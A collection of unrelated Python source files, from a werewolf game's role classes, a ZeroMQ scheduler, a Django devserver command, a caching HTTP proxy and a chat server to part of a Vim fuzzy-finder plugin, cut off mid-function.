White werewolf, can kill a person at day.
Attributes and methods are inherited from class SkilledPerson.
"""
def __init__(self, id: int, connection: socket.socket):
super(WhiteWerewolf, self).__init__(id, connection)
self.type = -2
def skill(self, timeout: float = defaultTimeout):
prompt = """请选择在自爆时要杀死的人\n你有%d秒的时间进行决定""" % (int(timeout), )
return SkilledPerson.skill(self, prompt, timeout)
class Predictor(SkilledPerson):
"""
Perdictor, can observe a player's identity at night.
Attributes and methods are inherited from class SkilledPerson.
"""
def __init__(self, id: int, connection: socket.socket):
super(Predictor, self).__init__(id, connection)
self.type = 1
def skill(self, timeout: float = defaultTimeout):
prompt = "请选择你要查验的人\n你有%d秒的时间进行决定" % (int(timeout), )
return SkilledPerson.skill(self, prompt, timeout)
class Witch(SkilledPerson):
"""
Witch, can kill a person or save a person at night.
Attributes and methods are inherited from class SkilledPerson.
"""
def __init__(self, id: int, connection: socket.socket):
super(Witch, self).__init__(id, connection)
self.type = 2
def skill(self, killed: int = 0, timeout: float = defaultTimeout):
packet = self._getBasePacket()
if self.used % 2 == 1:
killed = 0
self.inform("晚上%s玩家死了" % (
str(killed) + "号" if killed else "未知", )
)
if self.used == 0: # Not ever used
prompt = "你有一瓶解药,是否要救%d号玩家;你有一瓶毒药,是否使用\n输入0使用解药,玩家编号使用毒药,-1不使用,你有%d秒时间进行决定\n" % (
killed, int(timeout))
elif self.used == 1: # Saved somebody.
prompt = "你有一瓶毒药,是否使用\n输入玩家编号使用毒药,-1不使用\n你有%d秒的时间进行决定" % (
int(timeout), )
elif self.used == 2: # Killed somebody
prompt = "你有一瓶解药,是否要救%d号玩家\n输入0使用解药,输入-1不使用,你有%d秒时间进行决定\n" % (
killed, int(timeout))
else:
return None
return SkilledPerson.skill(self, prompt, timeout, "int")
class Hunter(SkilledPerson):
"""
Hunter, can kill a person when not being poisoned.
Attributes and methods are inherited from class SkilledPerson.
"""
def __init__(self, id: int, connection: socket.socket):
super(Hunter, self).__init__(id, connection)
self.type = 3
def skill(self, timeout: float = defaultTimeout):
prompt = "请选择你要杀死的玩家,你有%d秒时间进行决定\n" % (int(timeout), )
return SkilledPerson.skill(self, prompt, timeout)
class Guard(SkilledPerson):
"""
Guard, can guard a person to avoid him being killed.
Attributes and methods are inherited from class SkilledPerson.
"""
def __init__(self, id: int, connection: socket.socket):
super(Guard, self).__init__(id, connection)
self.type = 4
def skill(self, timeout: float = defaultTimeout):
prompt = "请选择你要守卫的玩家,你有%d秒时间进行决定\n" % (int(timeout), )
return SkilledPerson.skill(self, prompt, timeout)
class Idiot(SkilledPerson):
"""
Idiot, avoid from dying when being exiled.
Attributes and methods are inherited from class SkilledPerson.
"""
def __init__(self, id: int, connection: socket.socket):
super(Idiot, self).__init__(id, connection)
self.type = 5
def skill(self):
"""
The skill() of class Idiot should not be called outside the class
"""
self.postSkill()
def onDead(self, killedAtNight, withFinalWords, timeouts):
if killedAtNight or self.used:
return super().onDead(withFinalWords, timeouts)
else:
self.skill()
return None
|
scheduler_head.py
|
#!/usr/bin/env python
#-*- encoding: utf-8 -*-
"""
"""
from __future__ import print_function
from __future__ import division
from multiprocessing import Process
import numpy as np
import multiprocessing
import argparse
import psutil
import socket
import time
import tqdm
import sys
import re
import os
import config
#import clusterweb.local.config as config
import numpy as np
import base64
import zlib
import cv2
import sys
import zmq
from scheduler import Scheduler
"""
===============================================================================
===============================================================================
"""
class WorkerData(object):
def __init__(self,addr=None,port=None,worker_id=None,
resources=None,excl=None,worker_num=None,
worker_addr=None):
self.addr = addr
self.port = port
self.worker_id = worker_id
self.worker_num = worker_num
self.resources = resources
assert isinstance(config.NUM_HEARTBEATS,int)
self.heartbeats = config.NUM_HEARTBEATS
"""
===============================================================================
===============================================================================
"""
# Server
class SchedulerHead(Scheduler):
def __init__(self,
head_addr=config.DEFAULT_HEAD_ADDRESS,
head_port=config.DEFAULT_HEAD_PORT):
super().__init__(head_addr=head_addr,head_port=head_port)
self.head_addr = head_addr
self.head_port = head_port
self.n_workers = 0
self.worker_ips = []
self.worker_ids = []
self.workers_data = {}
self.ports = [self.head_port]
self.head_socket = self.create_head_socket([self.head_port])
self.handles = {'I':self.init_handle,'H':self.heartbeat_handle}
Process(target=self.heartbeat,args=()).start()
#--------------------------------------------------------------------------
def create_head_socket(self,port):
context = zmq.Context()
head_socket = context.socket(zmq.REP)
head_socket.bind('tcp://{}:{}'.format('*',self.head_port))
return head_socket
#--------------------------------------------------------------------------
def send_job(self,worker_id):
pass
#--------------------------------------------------------------------------
def init_handle(self,worker2head_message):
message = worker2head_message.split(':')
worker_id = worker2head_message[1]
worker_addr = worker2head_message[2]
if not worker_id in self.worker_ids:
self.n_workers += 1
self.print_log("New worker: {}".format(worker_id))
w = WorkerData(addr=worker_addr,
worker_id=worker_id,
worker_num=self.n_workers)
self.workers_data[worker_id] = w
self.worker_ids.append(worker_id)
head2worker_message = 'I:{}:{}'.format(worker_id,
self.head_port+self.n_workers)
return head2worker_message
#--------------------------------------------------------------------------
def heartbeat_handle(self,message):
message = message.split(':')
worker_id = message[1]
if not worker_id in self.worker_ids:
raise Warning("Unknown worker: {}".format(worker_id))
worker_num = self.workers_data[worker_id].worker_num
self.print_log("Recieved heartbeat from worker: {}".format(worker_num))
return 'h'
#--------------------------------------------------------------------------
def heartbeat(self):
while True:
print('waiting for heartbeat')
worker2head_message = self.head_socket.recv().decode()
if message[0] in self.handles.keys():
head2worker_message = self.handles[worker2head_message[0]](
worker2head_message)
else:
raise Warning("Invalid message: {}".format(
worker2head_message))
self.head_socket.send_string(head2worker_message)
"""
===============================================================================
===============================================================================
"""
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--mode',required=False,type=str,
default='h')
parser.add_argument('--server',required=False,type=str,
default='{}:{}'.format(config.DEFAULT_HEAD_ADDRESS,
config.DEFAULT_HEAD_PORT))
args = parser.parse_args()
re_check = re.search("((\d{1,3}.){3}\d:\d{1,5})", args.server)
if re_check == None:
raise UserWarning("Invalid server arg: {}".format(args.server))
addr,port = args.server.split(':')
port = int(port)
if args.mode == 'h':
sh = SchedulerHead(head_addr=addr,head_port=port)
if __name__ == "__main__":
main()
|
notifier.py
|
# ===============================================================================
# Copyright 2013 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from traits.api import Int, Dict, Bool
import zmq
from threading import Thread, Lock
from pychron.messaging.broadcaster import Broadcaster
class Notifier(Broadcaster):
_handlers = Dict
port = Int
_lock = None
def setup(self, port):
if port:
self._lock = Lock()
context = zmq.Context()
self._setup_publish(context, port)
self._req_sock = context.socket(zmq.REP)
self._req_sock.bind("tcp://*:{}".format(port + 1))
#
t = Thread(name="ping_replier", target=self._handle_request)
t.setDaemon(1)
t.start()
def add_request_handler(self, name, func):
self._handlers[name] = func
def close(self):
with self._lock:
if self._sock:
self._sock.setsockopt(zmq.LINGER, 0)
self._sock.close()
self._sock = None
if self._req_sock:
self._req_sock.setsockopt(zmq.LINGER, 0)
self._req_sock.close()
self._req_sock = None
def send_notification(self, uuid, tag="RunAdded"):
msg = "{} {}".format(tag, uuid)
self.info("pushing notification - {}".format(msg))
self._send(msg)
def send_console_message(self, msg, tag="ConsoleMessage"):
msg = "{} {}".format(tag, msg)
self.info("push console message - {}".format(msg))
self._send(msg)
# private
def _port_changed(self):
if self.enabled:
self.setup(self.port)
def _handle_request(self):
sock = self._req_sock
poll = zmq.Poller()
poll.register(self._req_sock, zmq.POLLIN)
while sock:
socks = dict(poll.poll(1000))
with self._lock:
try:
if socks.get(sock) == zmq.POLLIN:
req = sock.recv()
if req == "ping":
sock.send("echo")
elif req in self._handlers:
func = self._handlers[req]
sock.send(func())
except zmq.ZMQBaseError:
pass
poll.unregister(self._req_sock)
# ============= EOF =============================================
|
devserver.py
|
from __future__ import absolute_import, print_function, unicode_literals
import atexit
import logging
import os
import subprocess
import sys
from threading import Thread
from django.contrib.staticfiles.management.commands.runserver import Command as RunserverCommand
from django.core.management import call_command
from django.core.management.base import CommandError
from kolibri.content.utils.annotation import update_channel_metadata_cache
logger = logging.getLogger(__name__)
class Command(RunserverCommand):
"""
Subclass the RunserverCommand from Staticfiles to optionally run webpack.
"""
def __init__(self, *args, **kwargs):
self.webpack_cleanup_closing = False
self.webpack_process = None
self.karma_cleanup_closing = False
self.karma_process = None
super(Command, self).__init__(*args, **kwargs)
def add_arguments(self, parser):
parser.add_argument(
'--webpack',
action='store_true',
dest='webpack',
default=False,
help='Tells Django runserver to spawn a webpack watch subprocess.',
)
parser.add_argument(
'--lint',
action='store_true',
dest='lint',
default=False,
help='Tells Django runserver to run the linting option on webpack subprocess.',
)
parser.add_argument(
'--karma',
action='store_true',
dest='karma',
default=False,
help='Tells Django runserver to spawn a karma test watch subprocess.', )
super(Command, self).add_arguments(parser)
def handle(self, *args, **options):
if options["webpack"]:
self.spawn_webpack(lint=options["lint"])
if options["karma"]:
self.spawn_karma()
update_channel_metadata_cache()
# migrate the ormq DB before starting.
call_command("migrate", interactive=False, database="ormq")
return super(Command, self).handle(*args, **options)
def spawn_webpack(self, lint):
self.spawn_subprocess(
"webpack_process",
self.start_webpack,
self.kill_webpack_process,
lint=lint)
def spawn_karma(self):
self.spawn_subprocess("karma_process", self.start_karma,
self.kill_karma_process)
def spawn_subprocess(self, process_name, process_start, process_kill,
**kwargs):
# We're subclassing runserver, which spawns threads for its
# autoreloader with RUN_MAIN set to true, we have to check for
# this to avoid running browserify twice.
if not os.getenv('RUN_MAIN', False) and not getattr(
self, process_name):
subprocess_thread = Thread(target=process_start, kwargs=kwargs)
subprocess_thread.daemon = True
subprocess_thread.start()
atexit.register(process_kill)
def kill_webpack_process(self):
if self.webpack_process and self.webpack_process.returncode is not None:
return
logger.info('Closing webpack process')
self.webpack_cleanup_closing = True
self.webpack_process.terminate()
def start_webpack(self, lint=False):
if lint:
cli_command = 'yarn run watch -- --lint'
logger.info(
'Starting webpack process with linting from Django runserver command'
)
else:
cli_command = 'yarn run watch'
logger.info(
'Starting webpack process from Django runserver command')
self.webpack_process = subprocess.Popen(
cli_command,
shell=True,
stdin=subprocess.PIPE,
stdout=sys.stdout,
stderr=sys.stderr)
if self.webpack_process.poll() is not None:
raise CommandError(
'Webpack process failed to start from Django runserver command'
)
logger.info(
'Django Runserver command has spawned a Webpack watcher process on pid {0}'.
format(self.webpack_process.pid))
self.webpack_process.wait()
if self.webpack_process.returncode != 0 and not self.webpack_cleanup_closing:
logger.error("Webpack process exited unexpectedly.")
def kill_karma_process(self):
if self.karma_process and self.karma_process.returncode is not None:
return
logger.info('Closing karma process')
self.karma_cleanup_closing = True
self.karma_process.terminate()
def start_karma(self):
logger.info(
'Starting karma test watcher process from Django runserver command'
)
self.karma_process = subprocess.Popen(
'yarn run test-karma:watch',
shell=True,
stdin=subprocess.PIPE,
stdout=sys.stdout,
stderr=sys.stderr)
if self.karma_process.poll() is not None:
raise CommandError(
'Karma process failed to start from Django runserver command')
logger.info(
'Django Runserver command has spawned a Karma test watcher process on pid {0}'.
format(self.karma_process.pid))
self.karma_process.wait()
if self.karma_process.returncode != 0 and not self.karma_cleanup_closing:
logger.error("Karma process exited unexpectedly.")
|
proxy_server.py
|
# This proxy support HTTP and also HTTPS.
# Because of TLS/SSL protocol, it is impossible to read messages or cache data in HTTPS connection
# This proxy server can only run on Linux 2.5+ system
import socket
import os
import threading
import select
import hashlib
import traceback
bind_host = ('0.0.0.0', 8080)
bind_num = 20
# A HTTP request header parser.
# Provide some simple API which is same as BaseHTTPRequestHandler in Python2.
class HTTPRequestParser(object):
def __init__(self, message):
try:
if isinstance(message, bytes):
message = message.decode()
command_line = message.split('\r\n')[0]
self.command = command_line.split()[0]
self.path = command_line.split()[1]
self.request_version = command_line.split()[2]
self.headers = {}
lines = message.split('\r\n')[1:]
headers = lines[:lines.index('')]
for header in headers:
header_item, header_data = header.split(': ', 1)
self.headers[header_item.lower()] = header_data
except:
raise(Exception("Illegal HTTP Header"))
def forwardMsg(clientSocket, serverSocket, initMsg=[], cache=False, bufferSize=4096):
# Close all connection
def _closeConnection(epoll, clientSocket, serverSocket):
epoll.close()
clientSocket.close()
serverSocket.close()
# Check whether a file has been cached or can be cached.
# Return Format:
# return a tuple with two elements (_valid, _file)
# _valid will be True if the request has been cached, otherwise, False.
# _file will be a file object if the request has been cached or can be cached. Otherwise, None.
def _checkCacheFile(message_list):
message = b''
for msg in message_list:
message += msg
request = HTTPRequestParser(message)
# Only cache request with method GET.
if request.command == 'GET':
# Hash the message with MD5 algorithm.
# Only when hole request messages are same can be recognized as the same request.
hash = hashlib.md5()
hash.update(message)
filename = 'cache/' + hash.hexdigest()
if os.path.exists(filename):
return True, open(filename, 'rb')
else:
return False, open(filename, 'wb')
else:
return False, None
# Create a epoll object to efficiently solve I/O multiplexing problem.
http_epoll = select.epoll()
# Register client to read event.
http_epoll.register(clientSocket.fileno(), select.EPOLLIN)
# Register server to write event.
http_epoll.register(serverSocket.fileno(), select.EPOLLOUT)
opposites = {serverSocket.fileno(): clientSocket.fileno(), clientSocket.fileno(): serverSocket.fileno()}
sockets = {serverSocket.fileno(): serverSocket, clientSocket.fileno(): clientSocket}
buff = {serverSocket.fileno(): initMsg, clientSocket.fileno(): []}
cacheFile = None
try:
while True:
# Catch the socket events.
events = http_epoll.poll()
for fileno, event in events:
if event & select.EPOLLHUP:
# Finish caching when socket closed.
if cache and cacheFile != None:
cacheFile.close()
cacheFile = None
# Close connection when socket hanged up.
_closeConnection(http_epoll, clientSocket, serverSocket)
return
elif event & select.EPOLLIN:
# Socket is now available for reading.
data = sockets[fileno].recv(bufferSize)
if data:
# Append data to sending buffer of the other socket.
buff[opposites[fileno]].append(data)
# The other socket is now ready to send message and register the event.
http_epoll.modify(opposites[fileno], select.EPOLLOUT)
# Finish caching when there is another request sent from browser.
if cache and cacheFile != None and fileno == clientSocket.fileno():
cacheFile.close()
cacheFile = None
# Cache the data from remote server if a file is being cached.
elif cache and cacheFile != None and fileno == serverSocket.fileno():
cacheFile.write(data)
else:
# Finish caching when socket closed.
if cache and cacheFile != None and fileno == serverSocket.fileno():
cacheFile.close()
cacheFile = None
# Close connection when socket closed by remote.
_closeConnection(http_epoll, clientSocket, serverSocket)
return
elif event & select.EPOLLOUT:
# Socket is now available for writing.
# Check weather the request has been cached or can be cached before sending to the server.
if cache and fileno == serverSocket.fileno():
valid, file = _checkCacheFile(buff[fileno])
if valid:
# The request has been cached, respond to the browser immediately.
buff[opposites[fileno]].append(file.read())
# Clean the sending buffer.
buff[fileno].clear()
# Clean events between proxy and server.
http_epoll.modify(fileno, 0)
# The socket to the browser is now ready to send message and register the event.
http_epoll.modify(opposites[fileno], select.EPOLLOUT)
print('read from cache')
# Prevent request from sending to server.
continue
else:
# The request is being cached.
cacheFile = file
# Forward message to the other side.
for data in buff[fileno]:
sockets[fileno].send(data)
# Clean the sending buffer.
buff[fileno].clear()
# The socket is now ready to receive message and register the event.
http_epoll.modify(fileno, select.EPOLLIN)
except BrokenPipeError:
# Socket closed by browser unexpected.
print("connection closed by remote server")
finally:
_closeConnection(http_epoll, clientSocket, serverSocket)
def httpsProxy(connectionSocket, message, host, port=443):
serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# Connect to the socket.
serverSocket.connect((host, port))
# Parse the header and get request version.
request = HTTPRequestParser(message)
# Send response to browser.
connectionSocket.send("{} 200 Connection Established\r\n\r\n".format(request.request_version).encode())
# Forward message to the server.
forwardMsg(connectionSocket, serverSocket)
except:
traceback.print_exc()
print("Illegal request")
def httpProxy(connectionSocket, message, host, port=80):
serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# Connect to the socket.
serverSocket.connect((host, port))
# Forward message and cache files.
forwardMsg(connectionSocket, serverSocket, initMsg=[message], cache=True)
except:
traceback.print_exc()
print("Illegal request")
def proxyServe(serverSocket):
while True:
# Strat receiving data from the client.
connectionSocket, addr = serverSocket.accept()
message = connectionSocket.recv(1024)
try:
# Try to Parse HTTP header.
request = HTTPRequestParser(message)
except Exception as e:
# Omit the request if it is illegal.
print(str(e))
continue
host_prot = request.headers['host']
if ':' in host_prot:
host, port = host_prot.split(':')
port = int(port)
else:
host = host_prot
port = 80
print(host, port)
if request.command == 'CONNECT':
thread = threading.Thread(target=httpsProxy, args=(connectionSocket, message, host, port))
thread.start()
else:
thread = threading.Thread(target=httpProxy, args=(connectionSocket, message, host, port))
thread.start()
if __name__ == '__main__':
# Create a server socket, bind it to a port and start listening.
serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serverSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serverSocket.bind(bind_host)
serverSocket.listen(bind_num)
# Make directory to store cache file.
if not os.path.exists('cache'):
os.mkdir('cache')
try:
proxyServe(serverSocket)
except KeyboardInterrupt:
serverSocket.close()
|
FinalProjectServer.py
|
# imports
import socket
import threading
class ChatServer:
clients_list = []
last_received_message = ""
def __init__(self):
self.server_socket = None
self.create_listening_server()
# listen for incoming connection
def create_listening_server(self):
self.server_socket = socket.socket(socket.AF_INET,
socket.SOCK_STREAM) # create a socket using TCP port and ipv4
local_ip = '127.0.0.1'
local_port = 10319
# this will allow you to immediately restart a TCP server
self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# this makes the server listen to requests coming from other computers on the network
self.server_socket.bind((local_ip, local_port))
print("Listening for incoming messages..")
self.server_socket.listen(5) # listen for incomming connections / max 5 clients
self.receive_messages_in_a_new_thread()
# fun to receive new msgs
def receive_messages(self, so):
while True:
incoming_buffer = so.recv(256) # initialize the buffer
if not incoming_buffer:
break
self.last_received_message = incoming_buffer.decode('utf-8')
self.broadcast_to_all_clients(so) # send to all clients
so.close()
# broadcast the message to all clients
def broadcast_to_all_clients(self, senders_socket):
for client in self.clients_list:
socket, (ip, port) = client
if socket is not senders_socket:
socket.sendall(self.last_received_message.encode('utf-8'))
def receive_messages_in_a_new_thread(self):
while True:
client = so, (ip, port) = self.server_socket.accept()
self.add_to_clients_list(client)
print('Connected to ', ip, ':', str(port))
t = threading.Thread(target=self.receive_messages, args=(so,))
t.start()
# add a new client
def add_to_clients_list(self, client):
if client not in self.clients_list:
self.clients_list.append(client)
if __name__ == "__main__":
ChatServer()
|
manager.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import vim
import os
import sys
import time
import operator
import itertools
import threading
import multiprocessing
from functools import partial
from functools import wraps
from .instance import LfInstance
from .cli import LfCli
from .utils import *
from .fuzzyMatch import FuzzyMatch
from .asyncExecutor import AsyncExecutor
is_fuzzyEngine_C = False
try:
import fuzzyEngine
is_fuzzyEngine_C = True
cpu_count = multiprocessing.cpu_count()
lfCmd("let g:Lf_fuzzyEngine_C = 1")
except ImportError:
lfCmd("let g:Lf_fuzzyEngine_C = 0")
is_fuzzyMatch_C = False
try:
import fuzzyMatchC
is_fuzzyMatch_C = True
lfCmd("let g:Lf_fuzzyMatch_C = 1")
except ImportError:
lfCmd("let g:Lf_fuzzyMatch_C = 0")
if sys.version_info >= (3, 0):
def isAscii(str):
try:
str.encode("ascii")
return True
except UnicodeEncodeError:
return False
else:
def isAscii(str):
try:
str.decode("ascii")
return True
except UnicodeDecodeError:
return False
def modifiableController(func):
@wraps(func)
def deco(self, *args, **kwargs):
self._getInstance().buffer.options['modifiable'] = True
func(self, *args, **kwargs)
self._getInstance().buffer.options['modifiable'] = False
return deco
def catchException(func):
@wraps(func)
def deco(self, *args, **kwargs):
try:
func(self, *args, **kwargs)
except vim.error as e: # for neovim
if str(e) != "b'Keyboard interrupt'" and str(e) != 'Keyboard interrupt':
raise e
elif self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
except KeyboardInterrupt: # <C-C>, this does not work in vim
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
return deco
#*****************************************************
# Manager
#*****************************************************
class Manager(object):
def __init__(self):
self._autochdir = 0
self._instance = None
self._cli = LfCli()
self._explorer = None
self._content = []
self._index = 0
self._help_length = 0
self._show_help = False
self._selections = {}
self._highlight_pos = []
self._highlight_pos_list = []
self._highlight_refine_pos = []
self._highlight_ids = []
self._orig_line = ''
self._ctrlp_pressed = False
self._fuzzy_engine = None
self._result_content = []
self._reader_thread = None
self._timer_id = None
self._highlight_method = lambda : None
self._orig_cwd = None
self._cursorline_dict = {}
self._empty_query = lfEval("get(g:, 'Lf_EmptyQuery', 1)") == '1'
self._preview_in_popup = lfEval("get(g:, 'Lf_PreviewInPopup', 0)") == '1'
self._preview_winid = 0
self._match_ids = []
self._vim_file_autoloaded = False
self._getExplClass()
#**************************************************************
# abstract methods, in fact all the functions can be overridden
#**************************************************************
def _getExplClass(self):
"""
this function MUST be overridden
return the name of Explorer class
"""
raise NotImplementedError("Can't instantiate abstract class Manager "
"with abstract methods _getExplClass")
def _defineMaps(self):
pass
def _cmdExtension(self, cmd):
"""
this function can be overridden to add new cmd
if return true, exit the input loop
"""
pass
def _argaddFiles(self, files):
# It will raise E480 without 'silent!'
lfCmd("silent! argdelete *")
for file in files:
lfCmd("argadd %s" % escSpecial(file))
def _issue_422_set_option(self):
if lfEval("has('nvim')") == '1':
lfCmd("silent! setlocal number<")
lfCmd("silent! setlocal relativenumber<")
lfCmd("silent! setlocal foldlevel<")
lfCmd("silent! setlocal cursorline<")
lfCmd("silent! setlocal colorcolumn<")
lfCmd("silent! setlocal winhighlight<")
def _acceptSelection(self, *args, **kwargs):
if len(args) == 0:
return
file = args[0]
try:
if not os.path.isabs(file):
file = os.path.join(self._getInstance().getCwd(), lfDecode(file))
file = os.path.normpath(lfEncode(file))
if kwargs.get("mode", '') != 't' or (lfEval("get(g:, 'Lf_DiscardEmptyBuffer', 0)") == '1'
and len(vim.tabpages) == 1 and len(vim.current.tabpage.windows) == 1
and vim.current.buffer.name == '' and len(vim.current.buffer) == 1
and vim.current.buffer[0] == '' and not vim.current.buffer.options["modified"]):
if vim.current.buffer.options["modified"]:
lfCmd("hide edit %s" % escSpecial(file))
else:
lfCmd("edit %s" % escSpecial(file))
else:
lfCmd("tab drop %s" % escSpecial(file))
except vim.error as e: # E37
lfPrintError(e)
def _getDigest(self, line, mode):
"""
this function can be overridden
specify what part in the line to be processed and highlighted
Args:
mode: 0, return the full path
1, return the name only
2, return the directory name
"""
if mode == 0:
return line
elif mode == 1:
return getBasename(line)
else:
return getDirname(line)
def _getDigestStartPos(self, line, mode):
"""
this function can be overridden
return the start position of the digest returned by _getDigest()
Args:
mode: 0, return the start postion of full path
1, return the start postion of name only
2, return the start postion of directory name
"""
if mode == 0 or mode == 2:
return 0
else:
return lfBytesLen(getDirname(line))
def _createHelp(self):
return []
def _setStlMode(self, **kwargs):
if self._cli.isFuzzy:
if self._getExplorer().supportsNameOnly():
if self._cli.isFullPath:
mode = 'FullPath'
else:
mode = 'NameOnly'
else:
mode = 'Fuzzy'
else:
mode = 'Regex'
modes = {"--nameOnly", "--fullPath", "--fuzzy", "--regexMode"}
for opt in kwargs.get("arguments", {}):
if opt in modes:
if opt == "--regexMode":
mode = 'Regex'
elif self._getExplorer().supportsNameOnly():
if opt == "--nameOnly":
mode = 'NameOnly'
elif opt == "--fullPath":
mode = 'FullPath'
else: # "--fuzzy"
if self._cli.isFullPath:
mode = 'FullPath'
else:
mode = 'NameOnly'
elif opt in ("--nameOnly", "--fullPath", "--fuzzy"):
mode = 'Fuzzy'
break
self._getInstance().setStlMode(mode)
self._cli.setCurrentMode(mode)
def _beforeEnter(self):
self._resetAutochdir()
self._cur_buffer = vim.current.buffer
def _afterEnter(self):
if self._vim_file_autoloaded == False:
category = self._getExplorer().getStlCategory()
if category == 'Colorscheme':
category = 'Colors'
lfCmd("silent! call leaderf#%s#a_nonexistent_function()" % category)
self._vim_file_autoloaded = True
if "--nowrap" in self._arguments:
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'setlocal nowrap')" % self._getInstance().getPopupWinId())
elif self._getInstance().getWinPos() == 'floatwin':
lfCmd("call nvim_win_set_option(%d, 'wrap', v:false)" % self._getInstance().getPopupWinId())
else:
self._getInstance().window.options['wrap'] = False
else:
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'setlocal wrap')" % self._getInstance().getPopupWinId())
elif self._getInstance().getWinPos() == 'floatwin':
lfCmd("call nvim_win_set_option(%d, 'wrap', v:true)" % self._getInstance().getPopupWinId())
else:
self._getInstance().window.options['wrap'] = True
if self._getInstance().getWinPos() != 'popup':
self._defineMaps()
id = int(lfEval("matchadd('Lf_hl_cursorline', '.*\%#.*', 9)"))
self._match_ids.append(id)
else:
lfCmd("""call win_execute({}, 'let matchid = matchadd(''Lf_hl_cursorline'', ''.*\%#.*'', 9)')"""
.format(self._getInstance().getPopupWinId()))
id = int(lfEval("matchid"))
self._match_ids.append(id)
if is_fuzzyEngine_C:
self._fuzzy_engine = fuzzyEngine.createFuzzyEngine(cpu_count, False)
def _beforeExit(self):
if self._getInstance().window.valid:
self._getInstance().cursorRow = self._getInstance().window.cursor[0]
self._getInstance().helpLength = self._help_length
self.clearSelections()
self._getExplorer().cleanup()
if self._fuzzy_engine:
fuzzyEngine.closeFuzzyEngine(self._fuzzy_engine)
self._fuzzy_engine = None
if self._reader_thread and self._reader_thread.is_alive():
self._stop_reader_thread = True
self._closePreviewPopup()
if self._getInstance().getWinPos() == 'popup':
for i in self._match_ids:
lfCmd("silent! call matchdelete(%d, %d)" % (i, self._getInstance().getPopupWinId()))
else:
for i in self._match_ids:
lfCmd("silent! call matchdelete(%d)" % i)
self._match_ids = []
def _afterExit(self):
pass
def _bangEnter(self):
self._current_mode = 'NORMAL'
if self._getInstance().getWinPos() == 'popup':
self._cli.hideCursor()
if lfEval("exists('*leaderf#%s#NormalModeFilter')" % self._getExplorer().getStlCategory()) == '1':
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', '%s')" % (self._getInstance().getPopupWinId(),
'leaderf#%s#NormalModeFilter' % self._getExplorer().getStlCategory()))
else:
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', function('leaderf#NormalModeFilter', [%d]))"
% (self._getInstance().getPopupWinId(), id(self)))
self._resetHighlights()
if self._cli.pattern and self._index == 0:
self._search(self._content)
def _bangReadFinished(self):
pass
def _getList(self, pairs):
"""
this function can be overridden
return a list constructed from pairs
Args:
pairs: a list of tuple(weight, line, ...)
"""
return [p[1] for p in pairs]
def _getUnit(self):
"""
indicates how many lines are considered as a unit
"""
return 1
def _supportsRefine(self):
return False
def _previewInPopup(self, *args, **kwargs):
pass
def _closePreviewPopup(self):
if lfEval("has('nvim')") == '1':
if self._preview_winid:
if int(lfEval("nvim_win_is_valid(%d) == v:true" % self._preview_winid)):
lfCmd("call nvim_win_close(%d, 1)" % self._preview_winid)
self._preview_winid = 0
else:
if self._preview_winid:
lfCmd("call popup_close(%d)" % self._preview_winid)
self._preview_winid = 0
def _previewResult(self, preview):
if self._getInstance().getWinPos() == 'floatwin':
self._cli.buildPopupPrompt()
if int(lfEval("win_id2win(%d)" % self._preview_winid)) != vim.current.window.number:
self._closePreviewPopup()
if not self._needPreview(preview):
return
line = self._getInstance().currentLine
if self._preview_in_popup:
self._previewInPopup(line)
return
orig_pos = self._getInstance().getOriginalPos()
cur_pos = (vim.current.tabpage, vim.current.window, vim.current.buffer)
saved_eventignore = vim.options['eventignore']
vim.options['eventignore'] = 'BufLeave,WinEnter,BufEnter'
try:
vim.current.tabpage, vim.current.window = orig_pos[:2]
self._acceptSelection(line)
lfCmd("augroup Lf_Cursorline")
lfCmd("autocmd! BufwinEnter <buffer> setlocal cursorline<")
lfCmd("augroup END")
finally:
vim.current.tabpage, vim.current.window, vim.current.buffer = cur_pos
vim.options['eventignore'] = saved_eventignore
def _restoreOrigCwd(self):
if self._orig_cwd is None:
return
# https://github.com/neovim/neovim/issues/8336
if lfEval("has('nvim')") == '1':
chdir = vim.chdir
else:
chdir = os.chdir
try:
if int(lfEval("&autochdir")) == 0 and os.getcwd() != self._orig_cwd:
chdir(self._orig_cwd)
except:
if os.getcwd() != self._orig_cwd:
chdir(self._orig_cwd)
def _needExit(self, line, arguments):
return True
def setArguments(self, arguments):
self._arguments = arguments
def getArguments(self):
return self._arguments
#**************************************************************
def _createPopupModePreview(self, title, buf_number, line_nr, jump_cmd):
if lfEval("has('nvim')") == '1':
width = int(lfEval("get(g:, 'Lf_PreviewPopupWidth', 0)"))
if width == 0:
maxwidth = int(lfEval("&columns"))//2
else:
maxwidth = min(width, int(lfEval("&columns")))
relative = 'editor'
lfCmd("silent! call bufload(%d)" % buf_number)
buffer_len = len(vim.buffers[buf_number])
float_window = self._getInstance().window
float_win_pos = lfEval("nvim_win_get_position(%d)" % float_window.id)
float_win_row, float_win_col = [int(i) for i in float_win_pos]
preview_pos = lfEval("get(g:, 'Lf_PopupPreviewPosition', 'top')")
if preview_pos.lower() == 'bottom':
anchor = "NW"
if self._getInstance().getPopupInstance().statusline_win:
statusline_height = 1
else:
statusline_height = 0
row = float_win_row + float_window.height + statusline_height
col = float_win_col
height = int(lfEval("&lines")) - row - 2
width = float_window.width
elif preview_pos.lower() == 'top':
anchor = "SW"
row = float_win_row - 1
col = float_win_col
height = row
width = float_window.width
else:
anchor = "SW"
start = int(lfEval("line('w0')")) - 1
